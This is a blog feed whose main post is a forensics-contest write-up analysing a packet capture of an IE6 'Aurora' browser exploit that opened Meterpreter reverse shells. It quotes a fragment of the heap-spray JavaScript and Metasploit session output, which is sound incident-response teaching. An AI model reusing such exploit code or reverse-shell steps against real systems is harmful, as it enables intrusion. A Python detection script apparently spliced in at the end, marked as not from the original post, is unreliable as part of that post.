src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4412483137185117953</id><published>2010-08-02T20:01:00.000-06:00</published><updated>2010-08-02T20:01:45.130-06:00</updated><title type='text'>Web application Fingerprinting with Blind Elephant</title><content type='html'>I don't talk about too many active fingerprinting applications; granted, I don't know that 
there have been a lot of new fingerprinting applications in a while.  Anyway, I ran across this today from one of the many posts picked up in Google Reader.  Looks promising; I'll leave it to you to find out, though!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4412483137185117953?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.h-online.com/security/news/item/Blind-Elephant-leads-the-way-in-fingerprinting-web-applications-1049429.html' title='Web application Fingerprinting with Blind Elephant'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4412483137185117953/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4412483137185117953' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4412483137185117953'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4412483137185117953'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/08/web-application-fingerprinting-with.html' title='Web application Fingerprinting with Blind Elephant'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6805849420059430228</id><published>2010-07-26T15:49:00.000-06:00</published><updated>2010-07-26T15:49:05.271-06:00</updated><title type='text'>Fingerprint Editor updated</title><content type='html'>Jeff put out a new 
version of the XML Fingerprint Editor for me this week after I started adding SIP fingerprints to Satori.  There have been a few updates recently; the main one here was for SIP, but there have been a few cosmetic changes as well.&lt;br /&gt;&lt;br /&gt;As for SIP and Satori, more will be coming out on that in the next few weeks.  I'm short on time, but about a week ago I started adding the ability for Satori to look for Server, UserAgent and a few other pieces of info out of UDP traffic.  Hopefully in the next week or two I'll have something available for download!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6805849420059430228?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://pagesperso-orange.fr/cycocrew/delphi/FingerprintEditorSetup.exe' title='Fingerprint Editor updated'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6805849420059430228/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6805849420059430228' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6805849420059430228'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6805849420059430228'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/07/fingerprint-editor-updated.html' title='Fingerprint Editor updated'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-48487679600801868</id><published>2010-07-08T17:07:00.000-06:00</published><updated>2010-07-08T17:07:55.713-06:00</updated><title type='text'>Contest #6 winners</title><content type='html'>Erik Hjelmvik, #2 and wins some prizes finally!&lt;br /&gt;&lt;br /&gt;Listening to the event live now.&lt;br /&gt;&lt;br /&gt;ps, I made finalist again, just not quite in the top 3.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-48487679600801868?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/48487679600801868/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=48487679600801868' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/48487679600801868'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/48487679600801868'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/07/contest-6-winners.html' title='Contest #6 winners'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4617335128193419234</id><published>2010-07-04T20:42:00.001-06:00</published><updated>2010-07-04T20:44:32.167-06:00</updated><title type='text'>Upcoming presentation for 
Forensics Challenge #6 and 4Cast Awards</title><content type='html'>On July 8th they will be presenting the awards for these 2 different things.  They'll also be streaming it for those not in attendance at the '2010 SANS What Works in Digital Forensics and Incident Response Summit'.  &lt;br /&gt;&lt;br /&gt;I didn't see any good links out there for these off of the forensics contest page, so unless you are used to doing SANS webinars and knew to look there, you may not have known this was happening:&lt;br /&gt;&lt;br /&gt;Forensics Contest #6: July 8th 6:30 EST&lt;br /&gt;https://www.sans.org/webcasts/forensic-challenge-winners-presentation-93648&lt;br /&gt;&lt;br /&gt;Live Forensics 4Cast Awards:  July 8th 7:30 EST&lt;br /&gt;https://www.sans.org/webcasts/live-forensic-4cast-awards-ceremony-93653&lt;br /&gt;&lt;br /&gt;Something for some of you to do in the wee hours of the night, at the end of your work day, or right after you get home, all depending on where you find yourself in the world.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4617335128193419234?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.sans.org/webcasts/' title='Upcoming presentation for Forensics Challenge #6 and 4Cast Awards'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4617335128193419234/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4617335128193419234' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4617335128193419234'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4617335128193419234'/><link rel='alternate' type='text/html' 
href='http://chatteronthewire.blogspot.com/2010/07/upcoming-presentation-for-forensics.html' title='Upcoming presentation for Forensics Challenge #6 and 4Cast Awards'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-7165161481422096742</id><published>2010-06-28T09:20:00.002-06:00</published><updated>2010-06-28T09:24:22.768-06:00</updated><title type='text'>Forensic contest #6 Answer</title><content type='html'>Ok, it is now 6/28/10 around the world, so here is my writeup on the latest forensics contest from forensicscontest.com. &lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Answer 1: http://10.10.10.10:8080/index.php&lt;br /&gt;Answer 2: vEI&lt;br /&gt;Answer 3a: index.phpmfKSxSANkeTeNrah.gif&lt;br /&gt;Answer 3b: DF3E567D6F16D040326C7A0EA29A4F41&lt;br /&gt;Answer 4: 1.3&lt;br /&gt;Answer 5: 87.6&lt;br /&gt;Answer 6a: Windows executable&lt;br /&gt;Answer 6b: B062CB8344CD3E296D8868FBEF289C7C&lt;br /&gt;Answer 7a: Every third packet&lt;br /&gt;Answer 7b: Every packet&lt;br /&gt;Answer 7c: Every 10-15 seconds&lt;br /&gt;Answer 8: 123.7&lt;br /&gt;Answer 9: B062CB8344CD3E296D8868FBEF289C7C&lt;br /&gt;Answer 10: 198.4&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Tools Used:&lt;br /&gt;NetworkMiner 0.92 - http://networkminer.sourceforge.net/&lt;br /&gt;SplitCap 1.3 - http://sourceforge.net/projects/splitcap/&lt;br /&gt;Satori 0.71 - http://myweb.cableone.net/xnih/download/satori.zip&lt;br /&gt;mz-filecarver 0.1 - http://myweb.cableone.net/xnih/download/filecarve-cmd.zip&lt;br /&gt;contest6 pack - http://myweb.cableone.net/xnih/download/contest6.zip&lt;br /&gt;frhed - http://frhed.sourceforge.net/&lt;br /&gt;wireshark - http://www.wireshark.org/&lt;br 
/&gt;&lt;br /&gt;Note:&lt;br /&gt;The file forensics part could be done, just as easily, with Linux, using tcpflow and foremost, but I wanted to introduce some new tools and challenge myself with using something a little different and sticking to doing it all in Windows.&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Timeline:&lt;br /&gt;Date of packet capture: 2010-04-28&lt;br /&gt;&lt;br /&gt;17:39:59.311284 - packet capture begins, client visits and grabs index.php via HTTP Get, this php file has&lt;br /&gt;17:39:59.773396 - client requests index.phpmfKSxSANkeTeNrah.gif&lt;br /&gt;17:40:00.577135 - Initial syn packet to port 4444 is sent that will set up a connection that stays active until 17:41:26, in which time it downloads a 748K file (meterpreter reverse tcp connection) among other things.&lt;br /&gt;17:40:35.258314 - first attempted connection (out of 119 that failed) to port 4445.  These packets have a unique fingerprint in how often (in number of packets sent) they change their IPID, SeqNum and Source Port.&lt;br /&gt;17:42:02.985483 - Initial syn packet to port 4445 is sent that will set up a connection that stays active until 17:43:17, in which time it also downloads a 748K file (another meterpreter reverse tcp session, most likely to keep a session open even after IE was closed) among other things.&lt;br /&gt;17:43:17.753022 - last packet in capture&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Process:&lt;br /&gt;&lt;br /&gt;I always like to start by trying to determine the OSes involved in the process.  This can help in understanding what else may be going on in the process.  So the first thing we'll do is run the capture file through Satori:&lt;br /&gt;&lt;br /&gt;We get 2 systems.  
According to the Overall system info we have SMB, TCP and Web User Agent identifications made:&lt;br /&gt;10.10.10.70 - Windows XP SP2+ workstation (SMB, TCP, and Web fingerprints) named SaucyDev in the workgroup/domain 'workgroup' (SMB fingerprint), running what appears to be IE 6.0 (MSIE 6.0; Windows NT 5.1; SV1) - where SV1 indicates SP2 or greater installed.&lt;br /&gt;&lt;br /&gt;10.10.10.10 - is some type of Linux system, running Apache, very generic TCP fingerprint.   Over the course of the conversation we have TCP ports 4444 and 4445 open (TCP fingerprint).&lt;br /&gt;&lt;br /&gt;Notes:&lt;br /&gt;http://10.10.10.10:8080/index.php was the infected file; we see this in the Referer under Web. (question #1)&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;The packet capture started at: 17:39:59.311284 on 2010-04-28; this will be used to calculate how long since the packet capture started so we know when things happen.  While in some cases I like to know how long it took to get from point A to B, I'm normally more interested in when it actually happened, so that I can try to correlate that with system logs across multiple systems.&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;To find out when the TCP session to port 4444 was opened we need to look at the SYN packets sent.  
Unfortunately, just because a SYN was sent doesn't mean the connection was actually made; there were numerous attempts made that were rejected!&lt;br /&gt;&lt;br /&gt;It is easier to verify what happened by looking at output from the Perl script (contest6.pl) that tracks 3 way handshakes (syn, syn/ack, ack):&lt;br /&gt;&lt;br /&gt;contest6.pl -r evidence06.pcap -o conv&lt;br /&gt;&lt;br /&gt;Attempted conversations:  119&lt;br /&gt;       [1] - Starts at packet number 1153&lt;br /&gt;       [2] - Starts at packet number 1155&lt;br /&gt;       [3] - Starts at packet number 1157&lt;br /&gt;       ...&lt;br /&gt;       [117] - Starts at packet number 1650&lt;br /&gt;       [118] - Starts at packet number 1652&lt;br /&gt;       [119] - Starts at packet number 1654&lt;br /&gt;Full 3 way handshake conversations:  2&lt;br /&gt;       [0] - Starts at packet number 13&lt;br /&gt;       [120] - Starts at packet number 1656&lt;br /&gt;Total Packets:  2554&lt;br /&gt;&lt;br /&gt;The first 3 way handshake started in packet #13&lt;br /&gt;&lt;br /&gt;One thing I found interesting running this script is I see 119 attempted conversations that just ended in RST/ACK packets, but if I follow a lot of those conversations in Wireshark they are a different conversation #.  This is because it reuses the TCP sequence number, so Wireshark sees those as part of the same conversation.  So while I see it as conversation 120, Wireshark actually sees it as 42.  
Wireshark may be more accurate, but I think by looking at it that way it misses the fact that the remote system is making multiple attempts to connect in each TCP stream.&lt;br /&gt;&lt;br /&gt;We can get all Syn packets using contest6.exe this way for readability:&lt;br /&gt;&lt;br /&gt;contest6.exe -r evidence06.pcap -l S &gt; syn-output.txt&lt;br /&gt;&lt;br /&gt;The last 3 fields, in order, are:  IPID, TCP Sequence Number, and the TCP Acknowledgement Number.&lt;br /&gt;13 17:40:00,577135 S 10.10.10.70:1036 -&gt; 10.10.10.10:4444 53 72acc97a 00000000&lt;br /&gt;&lt;br /&gt;So packet #13 was 1.265851 seconds after the start of the capture, or 1.3 seconds, assuming you figure the beginning of the 3 way handshake vs. the end of it.  1.3 seconds rounded off to the nearest 10th regardless.  (question #4)&lt;br /&gt;&lt;br /&gt;The other 3 way handshake took place in packet 1656, so back to syn-output.txt, we get:&lt;br /&gt;&lt;br /&gt;1656 17:42:02,985483 S 10.10.10.70:1044 -&gt; 10.10.10.10:4445 598 75fad66c 00000000&lt;br /&gt;&lt;br /&gt;123.674199 seconds, or 123.7 rounded off to the nearest 10th. (question #8)&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Now we need to look for Fin/Ack packets for connections closing; we can do that with:&lt;br /&gt;&lt;br /&gt;contest6.exe -r evidence06.pcap -l FA &gt; fa-output.txt&lt;br /&gt;&lt;br /&gt;Which we see part of below:&lt;br /&gt;1562 17:41:26,898379 FA 10.10.10.10:4444 -&gt; 10.10.10.70:1036 38671 e3317217 72ae4105&lt;br /&gt;1563 17:41:26,898438 FA 10.10.10.70:1036 -&gt; 10.10.10.10:4444 551 72ae4105 e3317217&lt;br /&gt;&lt;br /&gt;Using our start time from above we get 87.587 seconds since the start, or 87.6 rounded to the nearest 10th. 
(answer #5)&lt;br /&gt;&lt;br /&gt;We also see another closure here:&lt;br /&gt;2552 17:43:17,751953 FA 10.10.10.70:1044 -&gt; 10.10.10.10:4445 845 75fb02df 55a9adcc&lt;br /&gt;2553 17:43:17,752630 FA 10.10.10.10:4445 -&gt; 10.10.10.70:1044 24677 55a9adcc 75fb02e0&lt;br /&gt;&lt;br /&gt;This ends up being 198.44 seconds from the start of the capture, or 198.4 rounded to the nearest 10th.  (answer #10)&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Going back to the syn-output.txt we can see that the system 10.10.10.70 had actually been attempting to do connections to port 4445 even before its connection to port 4444 was closed:&lt;br /&gt;&lt;br /&gt;1533 17:41:22,305270 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 537 00fa0ff6 00000000&lt;br /&gt;1535 17:41:22,844924 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 538 00fa0ff6 00000000&lt;br /&gt;1537 17:41:23,282416 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 539 00fa0ff6 00000000&lt;br /&gt;1539 17:41:23,283067 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 540 00fe281a 00000000&lt;br /&gt;1541 17:41:23,829288 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 541 00fe281a 00000000&lt;br /&gt;1543 17:41:24,376142 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 542 00fe281a 00000000&lt;br /&gt;1545 17:41:24,376807 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 543 0102b86a 00000000&lt;br /&gt;1547 17:41:24,813664 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 544 0102b86a 00000000&lt;br /&gt;1549 17:41:25,360537 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 545 0102b86a 00000000&lt;br /&gt;1551 17:41:25,361178 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 546 0106f45b 00000000&lt;br /&gt;1553 17:41:25,798024 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 547 0106f45b 00000000&lt;br /&gt;1555 17:41:26,344909 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 548 0106f45b 00000000&lt;br /&gt;1557 17:41:26,345542 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 549 010b3308 00000000&lt;br /&gt;1559 17:41:26,782405 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 550 010b3308 
00000000&lt;br /&gt;[connection closed in here]&lt;br /&gt;1566 17:41:27,329294 S 10.10.10.70:1041 -&gt; 10.10.10.10:4445 553 010b3308 00000000&lt;br /&gt;1568 17:41:34,189450 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 554 7c016356 00000000&lt;br /&gt;1570 17:41:34,657404 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 555 7c016356 00000000&lt;br /&gt;1572 17:41:35,094902 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 556 7c016356 00000000&lt;br /&gt;1574 17:41:35,095570 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 557 7c058b67 00000000&lt;br /&gt;1576 17:41:35,641778 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 558 7c058b67 00000000&lt;br /&gt;1578 17:41:36,188636 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 559 7c058b67 00000000&lt;br /&gt;1580 17:41:36,189278 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 560 7c0a5039 00000000&lt;br /&gt;1582 17:41:36,735524 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 561 7c0a5039 00000000&lt;br /&gt;1584 17:41:37,282377 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 562 7c0a5039 00000000&lt;br /&gt;1586 17:41:37,283051 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 563 7c0f0451 00000000&lt;br /&gt;1588 17:41:37,829280 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 564 7c0f0451 00000000&lt;br /&gt;1590 17:41:38,376531 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 565 7c0f0451 00000000&lt;br /&gt;1592 17:41:38,376795 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 566 7c13ac51 00000000&lt;br /&gt;1594 17:41:38,813646 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 567 7c13ac51 00000000&lt;br /&gt;1596 17:41:39,360524 S 10.10.10.70:1042 -&gt; 10.10.10.10:4445 568 7c13ac51 00000000&lt;br /&gt;1598 17:41:46,149972 S 10.10.10.70:1043 -&gt; 10.10.10.10:4445 569 2be336bc 00000000&lt;br /&gt;&lt;br /&gt;This pattern repeats itself, both before and after port 4444 is closed, but as you can see every 15 packets it changes the source port it is sending from (question #7.3).  
Every packet it changes the IPID (question #7.2) and every 3 packets it changes the TCP Sequence Number (question #7.1).&lt;br /&gt;&lt;br /&gt;This pattern repeats itself 2 more full times before the end of the capture from this point.  It completes a total of 8 iterations over the packet capture.&lt;br /&gt;&lt;br /&gt;"contest6.pl -r evidence06.pcap -o ipinfo" could also be used to determine the info above.  Both programs have their uses, depending on what you are trying to determine.&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Now that we've looked at the simple stuff, let's feed the file to NetworkMiner and SplitCap.  Erik Hjelmvik recently released version 0.92 of NetworkMiner specifically for this contest; he added the ability for it to pick up better on conversations already in progress in the packet capture (no 3 way handshake), such as packets #1-12, which in the past would have been skipped.  So thanks Erik!  I'm actually still running the beta version of it, but I believe the full-blown version of 0.92 has since been released.&lt;br /&gt;&lt;br /&gt;Using NetworkMiner we can extract the php file.  Looking over that file and cleaning up code for readability we get this, plus a lot more, but for question #2 we see what it shoves in the data part of the array:&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;var c1 = "COMMENT";&lt;br /&gt;var Array1 = new Array();&lt;br /&gt;for (i = 0; i &lt; 1300; i++)&lt;br /&gt;{&lt;br /&gt; Array1[i] = document.createElement(c1);&lt;br /&gt; Array1[i].data = "vEI";&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;NetworkMiner also recovers a .gif file.  
After running through it we can go look at that file and get the MD5 off of the 1 by 1 pixel file:  DF3E567D6F16D040326C7A0EA29A4F41 (question #3)&lt;br /&gt;&lt;br /&gt;Unfortunately NetworkMiner doesn't help us with the non-standard traffic on port 4444 or 4445, at least not in the current version; maybe a future release will, we can hope at least.&lt;br /&gt;&lt;br /&gt;So let's move over to another program by Erik Hjelmvik, SplitCap.  It works nicely for this, though its one shortcoming in my opinion, like a lot of the scripts written that we've seen in the past, is that it doesn't take into account resent packets, out-of-order packets, etc. like NetworkMiner does.  Maybe that will be fixed in a future release; again, we can hope.&lt;br /&gt;&lt;br /&gt;Anyway, we'll run splitcap with:&lt;br /&gt;"splitcap -r evidence06.pcap -s flow -y L7"&lt;br /&gt;&lt;br /&gt;We get a directory created called evidence06, with ~21 files in there.  This is the TCP or UDP "data" after the respective headers for each of the streams.  
I believe it is the same general information that we could get with tcpflow on linux.&lt;br /&gt;&lt;br /&gt;The main ones of interest are:&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4444_10-10-10-70_1036.bin&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_8080_10-10-10-70_1035.bin&lt;br /&gt;evidence06.pcap.TCP_10-10-10-70_1035_10-10-10-10_8080.bin&lt;br /&gt;evidence06.pcap.TCP_10-10-10-70_1036_10-10-10-10_4444.bin&lt;br /&gt;evidence06.pcap.TCP_10-10-10-70_1044_10-10-10-10_4445.bin&lt;br /&gt;evidence06.pcap.UDP_10-10-10-70_138_10-10-10-255_138.bin&lt;br /&gt;&lt;br /&gt;The fun thing with using this is we can look at files like: evidence06.pcap.TCP_10-10-10-70_1035_10-10-10-10_8080.bin&lt;br /&gt;&lt;br /&gt;And see exactly what was requested:&lt;br /&gt;(question #1)&lt;br /&gt;GET /index.php HTTP/1.1&lt;br /&gt;Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*&lt;br /&gt;Accept-Language: en-us&lt;br /&gt;Accept-Encoding: gzip, deflate&lt;br /&gt;User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)&lt;br /&gt;Host: 10.10.10.10:8080&lt;br /&gt;Connection: Keep-Alive&lt;br /&gt;&lt;br /&gt;(question #3)&lt;br /&gt;GET /index.phpmfKSxSANkeTeNrah.gif HTTP/1.1&lt;br /&gt;Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*&lt;br /&gt;Referer: http://10.10.10.10:8080/index.php&lt;br /&gt;Accept-Language: en-us&lt;br /&gt;Accept-Encoding: gzip, deflate&lt;br /&gt;User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)&lt;br /&gt;Host: 10.10.10.10:8080&lt;br /&gt;Connection: Keep-Alive&lt;br /&gt;&lt;br /&gt;The 2 main ones we are interested in are the port 4444 and 4445 files that splitcap provided us.  
Opening these files up with a hex editor we see an initial 4 bytes 00 6a 0b 00, possibly a protocol header or a command to download a file, because immediately after this we see the MZ magic header info.  (question #6.1)  We'll come back to the initial 4 bytes here in a little bit.&lt;br /&gt;&lt;br /&gt;mzcarver.exe was written specifically to look for MZ headers in tcp dump files.  We could use foremost to carve this out, but I wanted to do this all on windows, without trying to get cygwin working on the system.  mzcarver does have some limitations at this point.  See the readme file that accompanies it for that.&lt;br /&gt;&lt;br /&gt;We use mzcarver.exe like this:&lt;br /&gt;mzcarver /r evidence06.pcap.TCP_10-10-10-10_4444_10-10-10-70_1036.bin /d&lt;br /&gt;mzcarver /r evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin /d&lt;br /&gt;&lt;br /&gt;The /d option dumps out to disk the pre and post data that surrounded the mz file.  At this point since I only carve out PE files, it appends .pe on the extracted file (this file could be a dll, exe, etc).&lt;br /&gt;&lt;br /&gt;After running mzcarever we get the following files:&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.post&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pre&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pe&lt;br /&gt;&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.post&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pre&lt;br /&gt;evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pe&lt;br /&gt;&lt;br /&gt;Checking the files, the first thing we notice is that the .pe files are the same size (748,032).  
Checking their MD5 sums we get:&lt;br /&gt;port 4444 one B062CB8344CD3E296D8868FBEF289C7C (question #6.2)&lt;br /&gt;port 4445 one B062CB8344CD3E296D8868FBEF289C7C (question #9)&lt;br /&gt;&lt;br /&gt;The same thing, so why did it download the same file twice, just on different ports?  Or more to the point why did "they" fire up a 2nd reverse TCP meterpreter session?  More on this still to come.&lt;br /&gt;&lt;br /&gt;Both .pre files have the same data in them "00 6a 0b 00".  With a small tweak to put it in the correct byte order we get:  000b 6a00 or in Decimal format 748,032, which is the size of the file that follows.  Note:  Erik Hjelmvik pointed this out to me in discussions we had on this contest.  I had figured out there was the pre/post info already, but hadn't determined if it was a protocol command or what at that time.&lt;br /&gt;&lt;br /&gt;Looking at the .post files, we see the first 14 bytes are the same, but after that they start to deviate:&lt;br /&gt;"16 03 00 00 4a 02 00 00 46 03 00 4b d9 48"&lt;br /&gt;&lt;br /&gt;Some quick searches in google seem to indicate the first 8-11 bytes there appear to be some type of SSL communication/handshake.&lt;br /&gt;&lt;br /&gt;Scanning through the .pe file with a hex editor we can see a lot of Open SSL info.  I believe it even tells the version of OpenSSL, 0.9.8k&lt;br /&gt;&lt;br /&gt;So between the OpenSSL references in the .pe file and what appears to be some type of SSL handshake in the .post info I'd say they are doing some type of encrypted data traffic after the sending of the file is complete.&lt;br /&gt;&lt;br /&gt;In an attempt to find out more about the .pe file I renamed it to .exe and tried executing it on a VM.  It comes up as an invalid executable.&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;In an attempt to understand what was going on here I downloaded Metasploit 3.4 and ran the ms10_002_aurora exploit against a few test VMs.  
I found that my XP SP2 IE6 box (base install of SP2, no patches) did appear to be vulnerable (imagine that). I ended up with this lovely screen:&lt;br /&gt;[*] Sending stage (748032 bytes) to 192.168.4.9&lt;br /&gt;[*] Meterpreter session 1 opened (192.168.4.10:4444 -&gt; 192.168.4.9:1149) at 2010-06-23 21:33:55 -0700&lt;br /&gt;&lt;br /&gt;As you can see here it sent 748032 bytes, again the same size we saw above, so this capture at least appears to have been done with Metasploit running on the Linux attack machine.&lt;br /&gt;&lt;br /&gt;Now the question is why the Windows box was constantly trying to connect back to the Linux host on port 4445 and why they started up a 2nd meterpreter session once it did.   Exploiting IE appears to work fine with the ms10_002_aurora exploit, but if/when the user closes IE down, your connection drops.  So how to overcome this....  As soon as you get your initial interactive session you upload a new program and launch it.  This new program will try to reverse connect back to you as a new process, perhaps set up to run as a new service, or just a simple one time run.  This way, even if IE gets closed down you get the new connection on port 4445 connected to you and go in over that connection.&lt;br /&gt;&lt;br /&gt;I honestly don't know if that is what happened in this case, but whatever was trying to contact back on port 4445 had to try multiple times and is quite chatty, leaving a specific signature that would be fairly easy to detect with an IDS.  It changes its source port every 15 packets, its seqnum every 3 and its ipid every 1, at least as long as it continues to try to connect to the remote system on port 4445 and fails.  
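&lt;br /&gt;&lt;br /&gt;The chatty reconnect behaviour described above is exactly what a defender can key on. As an added example (my own Python, not from the original post and not derived from the contest pcap), the script below walks a list of constructed packet summaries and flags any source that keeps sending SYNs to the same destination port without ever getting a SYN-ACK back, reporting the attempt count, how many source ports it burned through and the average gap between tries. The packet records, addresses and thresholds are constructed for the example; on a real capture the same function would be fed from tshark or scapy output.

```python
from collections import defaultdict

def make_sample_packets():
    """Constructed packet summaries (time_s, src, sport, dst, dport, tcp_flags).
    Modelled on the behaviour described above: repeated unanswered SYNs to
    10.10.10.10:4445 with the source port rolling over every few tries, plus
    one normal, answered connection to a web server for contrast."""
    pkts = []
    sport = 1040
    for i in range(20):
        if i > 0 and i % 5 == 0:
            sport += 1                     # client gave up and opened a new socket
        pkts.append((3.0 * i, "10.10.10.70", sport, "10.10.10.10", 4445, "S"))
    pkts.append((1.5, "10.10.10.70", 1037, "10.10.10.30", 80, "S"))
    pkts.append((1.6, "10.10.10.30", 80, "10.10.10.70", 1037, "SA"))
    return sorted(pkts)

def unanswered_syn_bursts(pkts, min_attempts=5, window_s=120.0):
    """Return one alert per (src, dst, dport) that sent at least min_attempts
    SYNs within window_s seconds and never saw a SYN-ACK come back."""
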